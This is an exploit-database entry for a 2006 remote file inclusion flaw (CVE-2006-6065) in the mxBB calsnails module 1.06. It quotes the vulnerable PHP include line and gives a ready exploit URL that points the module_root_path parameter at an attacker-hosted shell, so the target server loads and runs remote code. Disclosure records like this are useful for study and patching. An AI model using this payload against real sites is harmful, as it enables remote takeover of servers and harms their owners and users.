mxBB Module calsnails 1.06 - 'mx_common.php' File Inclusion

Author: bd0rk
type: webapps
platform: php
port: 
date_added: 2006-11-16 
date_updated:  
verified: 1 
codes: OSVDB-30536;CVE-2006-6065 
tags: 
aliases:  
screenshot_url:  
application_url: 

##################################################################
#                                                                #
# mxBB calsnails module 1.06 Remote File Inclusion Vulnerability #
#                                                                #
# Bugfounder: bd0rk || SOH-Crew                                  #
#                                                                #
# Website: www.soh-crew.it.tt                                    #
#                                                                #
# Gr33tings: nukedx, DeeJay, TheJT, str0ke                       #
#                                                                #
##################################################################

Mod-Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=21

Vulnerable Code: include_once($module_root_path . 'includes/cal_settings.'.$phpEx);

[+]Exploit: http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?

# milw0rm.com [2006-11-17]